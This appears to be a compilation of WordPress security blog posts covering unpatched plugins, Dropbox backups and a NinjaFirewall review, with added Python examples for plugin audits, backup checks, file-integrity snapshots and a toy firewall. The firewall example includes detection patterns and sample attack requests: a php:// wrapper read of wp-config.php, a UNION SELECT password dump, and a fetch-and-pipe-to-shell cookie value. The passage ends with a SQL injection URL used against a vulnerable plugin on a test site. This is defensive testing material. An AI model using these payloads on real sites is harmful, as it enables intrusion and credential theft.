WordPress communities have actively participated in translating the CMS into various languages. Currently according to WordPress.org, WordPress has been completely translated into more than 60 languages. Despite the fact that over 70% of WordPress sites are in English, translation makes the WordPress mission of democratising publishing a real possibility as websites and blogs can be produced in many, many languages and the platform instantly becomes relevant to a truly global audience.

Customizable

Although WordPress was seen largely as a blogging platform for a long time, it has been used to create all types of websites. For that, it is important to have control not only over content but also over the form in which it is published. WordPress was built to be fully customizable, and being an open-source project it welcomed contributions (to core, plugins and themes) that made it flexible enough to suit very different needs. This is one of the key reasons the platform has become popular, and it is also why it suits beginners who want to start a blog on their own.

The showcase section of WordPress.org is proof of how effective WordPress has been for various purposes along with being a good blogging platform. You can refer to this resource to start your own blog.

WordPress Plugins & Themes – There is a plugin for that!

Themes control the design and layout of a WordPress site (for example an image-and-text header, a video in the body, an archive list in the sidebar and an about-the-company footer) by providing templates. Plugins add functionality on top of those templates (turning the header into a carousel, making the site load faster), while widgets mostly affect appearance, such as what appears in the footer or sidebar.

Plugins and themes are what make it possible to use WordPress to build websites for so many different purposes. This is also why there are so many contributors to plugins and themes. While many contributors are professionals or companies, there is also a large community of amateurs and hobbyists working to make WordPress fit every need.

WordPress Plugins & Themes

Plugins

  • Plugin repository: 47,211 plugins
  • Downloads: 1,432,006,605

Themes

  • Spoilt for choice
    • Thousands of free themes on WordPress.org
    • 85 commercially supported GPL themes
  • Themes for every purpose
  • Themes changed nearly 2 million times in August 2016

The interest in WordPress and growing repository of plugins and themes has also encouraged many third-party companies and developers to produce premium themes, plugins and services professionally.

Social Media

The power wielded by social media platforms is huge. One only needs to look at the number of users on social media platforms for their importance to become clear, particularly for large businesses looking for a portal to engage their target audience. There are more than a billion users on Facebook alone. Combine this with the growing importance of Twitter as a promotional and engagement platform for large businesses, and you realise why the ability to embed these posts in your WordPress site is such a big deal. As this article on Business 2 Community mentions, “Twitter is the place to engage with companies: While just 20 of the Fortune 500 companies actually engage with their customers on Facebook, 83% have a presence on Twitter— as do 76% of the NASDAQ 100, 100% of Dow Jones companies, and 92% of the S&P 500.”

Being able to provide an experience for users to engage with authoritative long form content & instantly share it with their connections in bite size form to start a conversation all on a single platform can be a powerful tool for businesses.

While WordPress gives users control over content, it also understands that the real power of content is amplified through connections, which is what social media platforms are all about.

Embeds built into WordPress

  • Twitter
  • Youtube
  • Flickr
  • Vimeo
  • Photobucket
  • PollDaddy
  • SoundCloud
  • Gigya
  • Google Maps
  • Slideshare
  • Dailymotion

WordPress Is A Rising Star

As more people use a platform, its following tends to grow, because their interest has been roused. If so many people are choosing WordPress, the CMS must offer real value. Its continued growth can be attributed to the expectations that first pushed people to use WordPress proving true. The scary, or exciting, part is that everything that makes WordPress useful is only growing bigger and stronger in market terms, as the growth of the WordPress market shows.

People who contribute to the CMS:

  • Freelancers
  • Professionals
  • Amateurs & Hobbyists

All contribute to the WordPress community and make it richer. There are also many areas for contributions with:

  • Theme designs
  • Website design
  • Building plugins
  • Content management

“WordPress Hacked!”: Strengths As Weakness

All this interest inevitably attracts unwanted attention too. It already worries many that Google’s top search suggestions for “Is WordPress…” are “Is WordPress free” and “Is WordPress secure”. The popularity of WordPress makes it a target for hackers, or is at least perceived to. When a platform runs more than a quarter of all websites, a single exploitable flaw pays off at enormous scale: the same vulnerability can be tried against millions of sites with one script.

These points make WordPress sites an attractive option for hackers. It is inevitable, when a platform is so popular and offers so many opportunities, that it will attract those with nefarious aims.

However, the perception that the most popular CMS is also the most insecure one is simply not true. WordPress core has a good security record and is patched quickly, and more attention is being paid to hardening and securing WordPress sites than ever before. What the growing market share has brought is the challenge of scale. It has turned WordPress’ most cherished tools, plugins and themes, into double-edged swords, if only in part: most of the vulnerabilities exploited in the last few years have been in plugins and themes, or have stemmed from poor site maintenance (such as unpatched installs). Scale and an unregulated, fast-growing market have contributed both to the strengths and to the weaknesses of WordPress.

This is not mentioned as a warning sign but for the sake of spreading information. Awareness of pain points can lead to resolving or managing them more efficiently. WordPress is a community driven project & is based on informed users taking action.

You too can put best practices in place for your website and not make it easy for hackers. Often all it takes to protect your site is to make it a little harder to attack than the next one, yet it is striking how many people skip the easy steps.

With all these points considered there is no doubt that WordPress is here to stay; if anything, it will only grow bigger in the coming years. Being part of its community and this open-source project may seem like a double-edged sword to some, but if you stay informed and put basic best practices in place, you will not only be safe with your WordPress site, but happy as well.

WordPress website owners are always cautioned to keep their installations of WordPress, plugins and themes up to date. But when a plugin hasn’t been maintained or updated from the developer’s end, potential exploits threaten everyone who has it installed.

Being someone who grew up in the 90s, I still love video and audio cassettes. But as the world progressed to new technologies, the companies making the cassettes kept updating their technologies and methods too, and for good reason. No matter how I loved the uniqueness of magnetic tape, even I understood that it had its faults. It was time to move on.

The charm of old cassettes lingers

Most of the time, WordPress works the same way. The minute a problem is identified, developers work to release a fix for it, whether it’s in an add-on or in WordPress core.

This is why almost every piece of advice on the internet about ‘security practices for WordPress’ first tells site owners to update every component of their site.

But what does one do when the component itself is not updated after a vulnerability has been reported? Every site running it stays exposed for as long as that gap lasts, which makes this a particularly alarming situation.

What makes it worse is that few novice WordPress site owners know what to do when a plugin, theme or widget hasn’t been updated by its developer. This became especially relevant when El Rincón de Zerial’s security blog reported a cross-site scripting vulnerability in W3 Total Cache at the end of September.

About W3 Total Cache

W3 Total Cache is a WordPress caching plugin that helps sites load faster. A website’s load time, as any website owner knows, affects its reputation, views, and business. The faster it loads, the better it is perceived by its visitors. This is why caching plugins are so widely used in the WordPress community.

W3 Total Cache in particular had over 1 million active installs when the vulnerability was disclosed.

A screenshot of W3 Total Cache from the W3 Edge website (https://www.w3-edge.com)

This was because it had features that, according to its users, made it considerably better than other caching plugins. Not only did the plugin cache every layer of a WordPress site, from the HTML of a page to objects from the site’s database, it also handled mobile caching well. Most other caching plugins only cached the HTML of a page, so their performance was considerably lower.

The plugin, according to its page in the WordPress.org repository, has been used and trusted by company websites such as AT&T, mashable.com and pearsonified.com, amongst others.

About W3 Total Cache’s vulnerability

When the XSS vulnerability was reported, users of the plugin had already been complaining about support-related issues for six months and had received no response from the team that developed it.

To add to this, the previous major ‘update’ to the plugin had only been a simple change ensuring that it was compatible with the then latest versions of WordPress. Understandably there was concern over the damage this vulnerability could do if it was exploited.

But this wasn’t the first time the plugin had shown vulnerabilities. Like any other plugin, W3 Total Cache has had its share of flaws, some of which were exploited, as has happened with other caching plugins such as WP Super Cache.

The good news

The silver lining was that the plugin’s original developers released an update six days after the vulnerability was disclosed. The update patched not only this XSS but also four more issues that had been disclosed by SecuPress, and it introduced a number of new features as well.

The bad news

However, a number of W3 Total Cache users who updated the plugin have reported that the new version breaks their sites or renders some features useless.

What to do in case of an outdated plugin

This brings us to the most important course of action. When faced with a plugin or theme that has a disclosed vulnerability and is obviously out of date:

  1. Deactivate the plugin or theme until an update addressing the vulnerability has been released. Bear in mind that a deactivated plugin’s files stay on the server and can still be requested directly, so if the flaw lives in a file that runs without WordPress loading it, delete the plugin rather than just deactivating it.
  2. If it’s a free plugin or theme, follow its support forum on WordPress.org.
  3. If a patched update takes more than 48 hours to appear after the vulnerability is announced, contact the developer, informing them about the vulnerability and quoting your sources.
  4. In the meanwhile, look for alternatives that are compatible with your site so that it stays fully functional.
  5. If an update takes more than a month to come through, you could ask the community whether someone would like to adopt the theme or plugin. This has a procedure of its own, which you follow after communicating the problem to both the WordPress team and the community.
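The five steps above all rest on one judgment: is this plugin merely behind, or abandoned? As an added example (it is not from the original post and not any plugin’s code), the Python below makes that judgment from a record shaped like the WordPress.org plugin information API response for a plugin slug, which carries `version`, `last_updated` and `tested` fields. The records and installed versions are constructed by hand, not fetched, and the one-year staleness threshold and the running WordPress version are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Dict

# Thresholds and the running WordPress version are assumptions for this example,
# not WordPress.org policy.
STALE_DAYS = 365                # no release for a year: treat the plugin as unmaintained
CURRENT_WP = "4.7"              # the WordPress version the site runs (assumed)
AS_OF = datetime(2016, 12, 1)   # "today" for the constructed data below


@dataclass
class PluginStatus:
    slug: str
    installed: str
    latest: str
    days_since_release: int
    tested_up_to: str
    verdict: str            # "update", "stale" or "ok"


def version_tuple(v: str) -> tuple:
    """'0.9.4.1' -> (0, 9, 4, 1) so that dotted versions compare numerically."""
    return tuple(int(p) for p in v.split(".") if p.isdigit())


def assess(slug: str, installed: str, info: Dict[str, str], today: datetime = AS_OF) -> PluginStatus:
    """Classify one plugin from a record shaped like the plugins/info API response.

    Only three fields are used: 'version' (latest release), 'last_updated'
    (e.g. '2016-10-03 6:10am GMT') and 'tested' (highest WP version the author tested).
    """
    released = datetime.strptime(info["last_updated"].split(" ")[0], "%Y-%m-%d")
    age = (today - released).days
    latest = info["version"]
    tested = info.get("tested", "0")

    if version_tuple(installed) < version_tuple(latest):
        verdict = "update"      # steps 1-2: a newer release exists, review and apply it
    elif age > STALE_DAYS or version_tuple(tested) < version_tuple(CURRENT_WP):
        verdict = "stale"       # steps 3-5: chase the developer, line up an alternative
    else:
        verdict = "ok"
    return PluginStatus(slug, installed, latest, age, tested, verdict)


# Constructed records in the shape of api.wordpress.org/plugins/info responses.
# Versions and dates are made up for the example; do not read them as the plugins' history.
SAMPLE_INFO = {
    "w3-total-cache": {"version": "0.9.5", "last_updated": "2016-10-03 6:10am GMT", "tested": "4.7"},
    "old-widget":     {"version": "1.2",   "last_updated": "2014-05-01 9:00am GMT", "tested": "3.9"},
    "fresh-plugin":   {"version": "2.0.1", "last_updated": "2016-11-20 1:00pm GMT", "tested": "4.7"},
}

# Installed versions, as `wp plugin list` or the Plugins screen would show them (constructed).
INSTALLED = {"w3-total-cache": "0.9.4.1", "old-widget": "1.2", "fresh-plugin": "2.0.1"}


def audit(installed: Dict[str, str], info: Dict[str, Dict[str, str]],
          today: datetime = AS_OF) -> Dict[str, str]:
    """Return {slug: verdict} for every installed plugin that has an info record."""
    return {slug: assess(slug, ver, info[slug], today).verdict
            for slug, ver in installed.items() if slug in info}


if __name__ == "__main__":
    for slug, ver in INSTALLED.items():
        status = assess(slug, ver, SAMPLE_INFO[slug])
        print(f"{slug:16} installed {status.installed:8} latest {status.latest:8} "
              f"{status.days_since_release:4}d since release  -> {status.verdict}")
```

A plugin whose author has not shipped anything in a year and has not marked it as tested against your WordPress version is the case the post is about: the “stale” verdict is your cue to start at step 3 rather than wait for an update that may never come.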

This is why it’s important to always have a backup plan: you never know when a plugin is going to stop being updated.

After all, a number of contributors are developers who contribute to the community as a hobby. It takes a lot of time and effort to not only create a plugin, but to identify how to patch up vulnerabilities and do it according to the best security practices as well.
Moreover, when a plugin or theme is finally updated, you never know whether it’s going to break your WordPress site. Reliable backup solutions that let you test a backup before it goes live on your site are not just an option in such cases, they’re a necessity.

Making a WordPress backup to Dropbox seems like an attractive option because it is easy and cheap. But is it best practice, and will restores be as easy as the backups?

WordPress backup to Dropbox
Plugins generally store a copy of the API keys for your Dropbox account on your site. If your WordPress site is hacked, your backups may be compromised too.

There are generally two ways to make a WordPress backup to Dropbox. The first involves two manual steps: download your WordPress files with an FTP client and your WordPress database with phpMyAdmin, then upload it all to Dropbox. WordPress.org recommends having at least three copies of a given backup, and Dropbox can serve as the destination of one of them.

The other way seems easier: back up your WordPress database and files with a backup plugin. Backup & Restore Dropbox, Dropbox Backup by Supsystic and WordPress Backup to Dropbox are all plugins that back up to Dropbox.

Other plugins, such as Backup Guard and UpdraftPlus WordPress Backup Plugin, offer Dropbox as one of several optional destinations. In the case of the former the option is available only in the PRO version, whereas in the case of the latter it is an add-on.

The process is simple: you authorize the plugin against your Dropbox account, confirm, and you are done. Some plugins will then back up your WordPress site to Dropbox on the schedule you set. Keeping track of whether those backups actually happened is another matter altogether.

Apart from the simple process, cost is another factor that makes Dropbox a seemingly attractive option for backups. Some plugins that back up your WordPress site to Dropbox are free, and Dropbox itself is free up to 2 GB, so there appear to be no extra costs.

WordPress Backup to Dropbox: Think again!

In order to back up your WordPress site to Dropbox, a plugin needs to store an access token (API key) for your Dropbox account on the site itself. Anyone who compromises the site, whether through a plugin vulnerability or stolen admin credentials, can read that token and with it read, alter or delete the very backups you were counting on to recover. It is like leaving a spare key to your bank vault in your living room: you might as well have left the valuables in the living room too.

Backing up to Dropbox is simple enough, and our own WordPress backup plugin lets users upload a backup to Dropbox too. Users who know a particular version to be free of problems can download that backup to their Dropbox account. This is not a default option in the BlogVault plugin, and regular backups are not made to your Dropbox account, because we follow best practices for WordPress backups. Read more about why backups to Dropbox are not safe.

If you rely on Dropbox alone as the safety net for your WordPress site, then you are in trouble, at least in our experience.

Dropbox Backups & Restores

Apart from all of these points, there is another issue with backing up to Dropbox only: restores. After all, the entire point of making backups is to be able to restore our business or blog when we need to.

Most WordPress backup plugins compress your site into .zip or .gz archives. You cannot look inside such archives in Dropbox; you have to download them to sort out what they contain. Dropbox then becomes temporary storage rather than a complete backup solution.

Then there are seemingly simple matters like clutter. Regularly backing up to Dropbox clutters your account, and you may not be able to find the files you need quickly when you need them. When you have to restore your site, you don’t want to sift through thousands, if not millions, of files.

Tip: when backing up to Dropbox

Label the backups you download in an organised way (for example by date and by the version of the site they hold) so that you can tell different backups apart. This will be helpful when you have to restore your site.

You need to safeguard your data more robustly, so that in your hour of need you not only know that you have access to backups but also that they work. Especially if you’re running a small business or a popular blog, look at a more complete backup solution and keep WordPress backups to Dropbox only as an additional step.
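Whether the archive sits in Dropbox or anywhere else, a backup you have never opened is a guess about whether a restore will work. As an added example (not part of the original post and not the code of any plugin named in it), the Python below builds a small backup zip in memory, constructed to look like what a backup plugin produces (a `wp-config.php` plus a `.sql` dump and an upload), and checks the things a restore depends on: that both essential pieces are present, that the `DB_NAME` in `wp-config.php` is the database the dump was taken from, and that the dump carries the options table for the site’s `$table_prefix`. The file names, the dump layout and the checks themselves are this example’s assumptions.

```python
import io
import re
import zipfile
from typing import List, Optional


def build_sample_backup(db_name: str, prefix: str = "wp_",
                        dump_db: Optional[str] = None, include_dump: bool = True) -> bytes:
    """Construct a minimal backup archive in memory. Test fixture only: the
    wp-config.php, dump and upload below are made up, not taken from a real site."""
    dump_db = dump_db or db_name
    wp_config = (
        "<?php\n"
        f"define('DB_NAME', '{db_name}');\n"
        "define('DB_USER', 'wpuser');\n"
        "define('DB_PASSWORD', 'not-a-real-secret');\n"
        f"$table_prefix = '{prefix}';\n"
    )
    sql_dump = (
        f"-- MySQL dump of `{dump_db}`\n"
        f"CREATE DATABASE IF NOT EXISTS `{dump_db}`;\n"
        f"USE `{dump_db}`;\n"
        f"CREATE TABLE `{prefix}options` (`option_id` bigint, `option_name` varchar(191));\n"
        f"CREATE TABLE `{prefix}posts` (`ID` bigint);\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("wp-config.php", wp_config)
        if include_dump:
            zf.writestr("database.sql", sql_dump)
        zf.writestr("wp-content/uploads/2016/11/hero.jpg", b"\xff\xd8\xff\xe0 constructed bytes")
    return buf.getvalue()


def verify_backup(archive: bytes) -> List[str]:
    """Check the things a restore depends on. Returns a list of problems; empty means it passed."""
    problems: List[str] = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        names = zf.namelist()
        config_name = next((n for n in names if n.endswith("wp-config.php")), None)
        dump_name = next((n for n in names if n.endswith(".sql")), None)
        if config_name is None:
            problems.append("wp-config.php missing: the restore cannot tell which database to load")
        if dump_name is None:
            problems.append("no .sql dump: files without the database are not a restorable site")
        if problems:
            return problems
        config = zf.read(config_name).decode("utf-8", "replace")
        dump = zf.read(dump_name).decode("utf-8", "replace")

    db = re.search(r"define\(\s*'DB_NAME'\s*,\s*'([^']+)'", config)
    if not db:
        return ["DB_NAME not found in wp-config.php"]
    prefix_match = re.search(r"\$table_prefix\s*=\s*'([^']+)'", config)
    prefix = prefix_match.group(1) if prefix_match else "wp_"

    # The dump must be of the database wp-config.php points at, or the restored
    # site will come up against the wrong (or an empty) database.
    if f"`{db.group(1)}`" not in dump:
        problems.append(f"dump does not reference database {db.group(1)} named in wp-config.php")
    # The options table holds the site URL and the active plugins; without it nothing else matters.
    if f"CREATE TABLE `{prefix}options`" not in dump:
        problems.append(f"dump lacks {prefix}options; site settings would not be restored")
    return problems


if __name__ == "__main__":
    print(verify_backup(build_sample_backup("blog_prod")))
    print(verify_backup(build_sample_backup("blog_prod", dump_db="blog_staging")))
    print(verify_backup(build_sample_backup("blog_prod", include_dump=False)))
```

Run the same check over every archive a scheduled job produces and you have answered the question the post raises: not just “do I have backups?” but “would this one actually bring the site back?”. A mismatch between `DB_NAME` and the dump is exactly the kind of error that a staging-to-production copy introduces and that nobody notices until the restore.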

“Why do hackers hack websites?” is one of the more philosophical questions anyone with a website asks. Whatever the size of your WordPress site, protecting it from the common attacks against websites is definitely a concern.

Figuring out the best security option for your website (especially deciding between a WordPress firewall and an antivirus) takes a lot of research and technical know-how. But if you’ve decided to get a WordPress firewall, NinjaFirewall is one of the options you will have to consider.

This is why we decided to test NinjaFirewall (v 3.2.4) for you, and to do it from a WordPress newbie’s point of view. We’ve pitted it against the common exploits on WordPress sites to see if it stands our tests of fire.

A Web Application Firewall (or WAF) inspects HTTP requests according to customizable rules and runs as an appliance, a plugin, or a cloud-based service.

NinjaFirewall's logo
NinjaFirewall is a host-based WAF that runs for WordPress.

A host-based WAF runs on the same server as the application it protects (here, your WordPress site) and inspects requests before they reach it. This does not remove vulnerabilities from your site, but it reduces the chance that they can be reached and exploited.

About NinjaFirewall

NinjaFirewall allows you to install and configure it just like a WordPress plugin, but it’s a ‘stand-alone’ plugin that intercepts all requests made to WordPress. The fact that it’s ‘stand-alone’ means it has its own settings, options, policies and rules that you can configure. If you’ve googled NinjaFirewall, you’d have seen phrases saying that the firewall ‘sits in front of WordPress’. This simply means that NinjaFirewall intercepts requests with the aim of alerting you of, and stopping any suspicious activity/requests before they affect your site.

There are also a few hiccups you might run into during installation, which the NinjaFirewall team has documentation for; that is great if you aren’t a beginner with WordPress and know enough of the basics to understand code.

What NinjaFirewall Claims to Do for You

NinjaFirewall claims to intercept traffic and decide what to let through to your site. On installation, the firewall backs up your php.ini and .htaccess files and then modifies them so that every request made to your site passes through it first. It then filters requests using an extensive rule set (and a whitelist) to separate legitimate requests from malicious ones: bad requests are dropped, while normal requests are forwarded to WordPress. Its aim as a firewall is to prevent your site from getting hacked by stopping bad requests before they reach it.

Features

NinjaFirewall has a lot of features that work towards this end and add varied security functionality to your site. Each feature has its own options and settings, and we explain the most important ones below:

NinjaFirewall has a great-looking set of features

        1. Firewall Options

          This is where you enable or disable NinjaFirewall. You can also customize the error messages displayed on your site when the firewall blocks a request.

          Firewall Options

          If you have NinjaFirewall installed on another site and configured to your needs, you can import that configuration into a fresh installation from the Firewall Options section. The only requirement is that both sites run the same version of NinjaFirewall.
          Importing another configuration overrides every firewall-related rule, option or setting on the site you import into.

        2. Firewall Policies
          Most of the options that control how NinjaFirewall works are in the “Firewall Policies” section.
          None of these options need free-form input: the majority are Yes/No switches or check-boxes. The first few let you decide whether to require HTTPS (SSL) for traffic to your site, and, since a lot of hacks start with a file upload, whether to allow uploads at all. These first few options are easy enough to configure:

          Firewall Policies for traffic and uploads

          But as you scroll down the list they get more and more complex. Some options even caution you not to change them if you don’t understand what they entail. NinjaFirewall has documentation explaining all of them, but some still need technical knowledge, which is why we’re going to try to break it all down for you.

          HTTP variables are the values a client sends with a request: the GET (query string), POST (form body) and combined REQUEST arrays that PHP hands to WordPress. Nearly every attack arrives through them, so scanning them for dangerous values is a sound move.
          Sanitizing these variables makes sure that the site treats what arrives as data, not as code or commands to execute.

          Scanning and sanitizing the HTTP variables can keep you from a number of attacks

          These options keep suspicious bots from crawling your site:

          NinjaFirewall tries its best to keep suspicious bots from your site.

          The HTTP response header options add headers that tell the visitor’s browser how it may treat your pages (for example whether they may be framed by another site), which defends against attacks that play out on the browser’s side rather than on the server.

          These settings help NinjaFirewall protect you from attacks that play out in the visitor’s browser.

          There are also a few options that are unique to WordPress:

          These options help protect against SQL dumping and a number of shell scripts.

          These help protect your site from SQL dumping (an attacker pulling a copy of your entire database out through the site) as well as from a number of shell scripts. When attackers probe a site they make many attempts, and they depend on error messages to tell whether an attack worked. NinjaFirewall has the following options to stop your site displaying revealing error messages:

          These options prevent hackers from using PHP wrappers (such as php://) in GET and POST values. They also hide error messages.

          And then there are other ‘various’ options that you can enable:

          And then there are other 'various' options

          NinjaFirewall also has options that control requests made to, and access to, WordPress core files and directories:

          Options that control how the WordPress directories are handled

          This section is also where you can modify the firewall’s whitelist:

          There are also options to control your WordPress site's whitelist
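To make the “scan and sanitize HTTP variables” policies concrete, here is an added Python example, written for this review and not NinjaFirewall’s own code or rule set. It walks the GET, POST and COOKIE values of a few constructed requests and flags the classes of payload the policies above talk about: PHP stream wrappers, attempts to pull database contents out, shell-style command fragments, and the generic null-byte and traversal tricks. The signatures, the double percent-decoding, and the decision to block rather than sanitize are this example’s own choices.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Signatures are this example's own, grouped by the policy they illustrate.
# Each entry: (policy name, regex applied to every decoded key and value).
SIGNATURES = [
    # "PHP wrappers" policy: stream wrappers used to read source or smuggle code.
    ("php_wrapper", re.compile(r"(?i)\b(php|data|expect|phar|zip|glob)://")),
    # "SQL dump" policy: statements that read or export database contents.
    ("sql_dump", re.compile(r"(?i)\b(union\s+(all\s+)?select|into\s+outfile|information_schema|load_file\s*\()")),
    # "shell script" policy: command chaining followed by a shell or downloader.
    ("shell_cmd", re.compile(r"(?i)(;|\|\||&&|`)\s*(sh|bash|wget|curl|perl|python|nc)\b|/bin/(ba)?sh")),
    # Generic dangerous values: null bytes and directory traversal.
    ("null_byte", re.compile(r"%00|\x00")),
    ("traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
]


def decode(value: str) -> str:
    """Percent-decode twice so double encoding (%2570 -> %70 -> p) cannot hide a keyword."""
    return unquote(unquote(value))


def inspect_request(request: Dict[str, Dict[str, str]]) -> List[str]:
    """Return the policies a request violates as 'policy:SOURCE.key' strings."""
    hits: List[str] = []
    for source in ("GET", "POST", "COOKIE"):
        for key, raw in request.get(source, {}).items():
            value, name = decode(raw), decode(key)
            for policy, pattern in SIGNATURES:
                if pattern.search(value) or pattern.search(name):
                    hits.append(f"{policy}:{source}.{key}")
    return hits


def decide(request: Dict[str, Dict[str, str]]) -> str:
    """'forward' the request to WordPress, or 'block' it with the firewall's error page."""
    return "block" if inspect_request(request) else "forward"


# Constructed requests, already parsed into the arrays a PHP application would see.
SAMPLE_REQUESTS = {
    "normal_search":   {"GET": {"s": "wordpress backup"}, "COOKIE": {"wordpress_test_cookie": "WP Cookie check"}},
    "wrapper_in_get":  {"GET": {"file": "php://filter/convert.base64-encode/resource=wp-config.php"}},
    "encoded_wrapper": {"GET": {"tpl": "php%253A%252F%252Finput"}},
    "sqli_dump":       {"POST": {"id": "1 UNION ALL SELECT user_login,user_pass FROM wp_users"}},
    "shell_in_cookie": {"COOKIE": {"lang": "en; wget http://198.51.100.7/x.sh | sh"}},
    "traversal":       {"GET": {"path": "../../../../wp-config.php"}},
}


def run_all(requests: Dict[str, Dict[str, Dict[str, str]]]) -> Dict[str, str]:
    """Decision per named sample request."""
    return {name: decide(req) for name, req in requests.items()}


if __name__ == "__main__":
    for name, req in SAMPLE_REQUESTS.items():
        print(f"{name:16} {decide(req):8} {inspect_request(req)}")
```

Two things this toy makes visible that the screenshots do not. First, decoding matters as much as the patterns: `php%253A%252F%252Finput` is harmless to a filter that decodes once and a wrapper to one that decodes twice, which is why the firewall needs to normalise input before matching. Second, signatures produce false positives: a blog post whose body legitimately contains the words “UNION SELECT” would be blocked by the rule above, which is why a real WAF, NinjaFirewall included, pairs its rules with a whitelist and lets you tune policies rather than applying one fixed list.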

       

     

          1. File Check
            This feature helps create a ‘snapshot’ of files changed by comparing original files (or existing ones) against modifications. Once you create a snapshot (that you can later download or delete), it allows you to scan your site for file changes. You can not activate this scan before you create a snapshot.The File Check feature

         

1. Anti-Malware
NinjaFirewall also has an Anti-Malware feature, that allows you to scan for hacks. According to NinjaFirewall’s documentation, this feature doesn’t alert you of spammy links (like those that might redirect your visitors to porn sites). However, it does alert you based on signatures of malware that could damage your site. This isn’t a great way to go about scanning sites though, especially since hacks are complex. This is probably why this is the one feature on NinjaFirewall that allows you to add custom rules or signatures for malware or suspicious activity.

NinjaFirewall has an interesting feature called Anti-Malware, that allows you to add custom malware signatures.

NinjaFirewall has handy documentation for how to go about this. You will need to understand what to create signatures for, in order to make use of this feature.
The Anti-Malware feature poses a couple of issues though. More on them here.

2. Event Notifications
The firewall logs any suspicious activity in the Firewall Log section, but you can set how often it alerts you, and what to alert you of. This way, if the firewall blocks any attacks, you can see what happened from the Firewall Log. It’s always good to examine why and how it blocked the attack.

You can see exactly what triggers alerts, and how often they come in.
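The File Check feature described under item 1 above is, at bottom, a file-integrity snapshot: hash every file, store the result, and diff against a fresh pass later. As an added illustration of that mechanism (this is not NinjaFirewall’s code; the mini WordPress tree that `demo()` builds, its paths and the tampering applied to it are all constructed), here is the snapshot-and-compare logic in Python:

```python
"""File-integrity snapshot and comparison, the idea behind a 'File Check' feature.

Added example for this review; it is not NinjaFirewall's code. The mini
WordPress tree built in demo() and the tampering applied to it are constructed.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def take_snapshot(root: Path) -> dict:
    """Map every file under root (path relative to root) to its digest and size."""
    snapshot = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order, handy when diffing snapshot files by eye
        for name in sorted(filenames):
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            snapshot[rel] = {"sha256": hash_file(path), "size": path.stat().st_size}
    return snapshot


def save_snapshot(snapshot: dict, dest: Path) -> None:
    dest.write_text(json.dumps(snapshot, indent=1, sort_keys=True))


def load_snapshot(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(old: dict, new: dict) -> dict:
    """Classify what changed since the snapshot: added, modified and deleted paths."""
    added = sorted(set(new) - set(old))
    deleted = sorted(set(old) - set(new))
    modified = sorted(p for p in old.keys() & new.keys()
                      if old[p]["sha256"] != new[p]["sha256"])
    return {"added": added, "modified": modified, "deleted": deleted}


def demo() -> dict:
    """Build a constructed mini site, snapshot it, tamper with it, and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        work = Path(tmp)
        root = work / "wordpress"
        (root / "wp-includes").mkdir(parents=True)
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "index.php").write_text("<?php // constructed front controller\n")
        (root / "wp-includes" / "functions.php").write_text("<?php // constructed core file\n")
        (root / "wp-config.php").write_text("<?php define('DB_NAME', 'example');\n")

        # The snapshot lives outside the web root so it is not part of what it measures.
        snapshot_file = work / "snapshot.json"
        save_snapshot(take_snapshot(root), snapshot_file)

        # Constructed tampering of the kind a compromise leaves behind:
        # a core file edited, a PHP file dropped into uploads, a file removed.
        (root / "wp-includes" / "functions.php").write_text(
            "<?php // constructed core file\n// unexpected extra line\n")
        (root / "wp-content" / "uploads" / "image.php").write_text("<?php // unexpected file\n")
        (root / "index.php").unlink()

        return compare(load_snapshot(snapshot_file), take_snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Running it prints three lists: one added file under `wp-content/uploads/`, one modified core file and one deleted file. The snapshot is written outside the web root on purpose; a snapshot stored inside the directory it measures can be edited by whoever edits the files. A hash comparison only says what changed, not whether the change is malicious, which is why a feature like this is only useful if someone actually reviews the diff.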

         

     

1. Login Protection
Brute Force Attacks are a different thing altogether; NinjaFirewall has a separate option to help protect against these attacks: Login Protection. The option asks for HTTP authentication credentials, without which you can’t enable it. You can also set the message displayed when the firewall blocks such attacks.
2. Firewall Log
It is what it sounds like: a log of everything NinjaFirewall found unusual, according to the rules you set in Firewall Options. So if you’ve asked to be notified about any plugins updated, deleted or created, this log will contain all the details.
NinjaFirewall’s Firewall Log
3. Live Log
This feature monitors HTTP and HTTPS traffic on your site, so it aims at protecting against any traffic-related attacks (like Brute Force, DDoS, or unusual IPs trying to access your site).
4. Rules Editor
NinjaFirewall has a set of ‘rules’ according to which it operates. These rules are mostly signs, or signatures, of attacks that it tries to prevent. According to NinjaFirewall’s documentation, the rules are downloaded from the WordPress.org repository, and the plugin doesn’t contact NinTech’s servers during the update process.

The list of in-built security rules that NinjaFirewall follows

You can’t add your own rules, but you can modify them in the Firewall Policies section, if they’re greyed out in the drop-down.

5. Updates
This feature keeps your installation of NinjaFirewall up to date. Setting the firewall up to check for security rules is a tradeoff between choosing your custom configuration and keeping your site secure. Of course, you could ask to be notified about the changes and then go back and adjust them so they suit your requirements.
This option checks for NFW updates

         

     

What we tested it against

We ran a series of tests to evaluate first-hand the efficiency of NinjaFirewall against some of the common attacks WordPress sites face. For this, we created a test site (which would be the stand-in for your website): 139.59.28.51/wordpress

The vulnerabilities we tested the firewall against were:

1. SQL Injection

The Firestorm real-estate plugin (v 2.03, in this case) is one that contained a vulnerability that allowed for SQL Injection. This plugin allows you to add real-estate listings to your WordPress site.

Testing NinjaFirewall against SQL Injection

To exploit this vulnerability, we tried entering SQL code into the Firestorm plugin to get data from wp_users. (For those of us who don’t know what wp_users actually is: it lets you get data from, and modify the roles and capabilities of, WordPress users other than the admin.)

Here is the SQL code we used:

139.59.28.51/wordpress/wp-content/plugins/fs-real-estate-plugin/search.php?ProvinceID=35335 UNION SELECT 1, user_pass, 3, 4, 5, 6, 7, 8 from wp_users

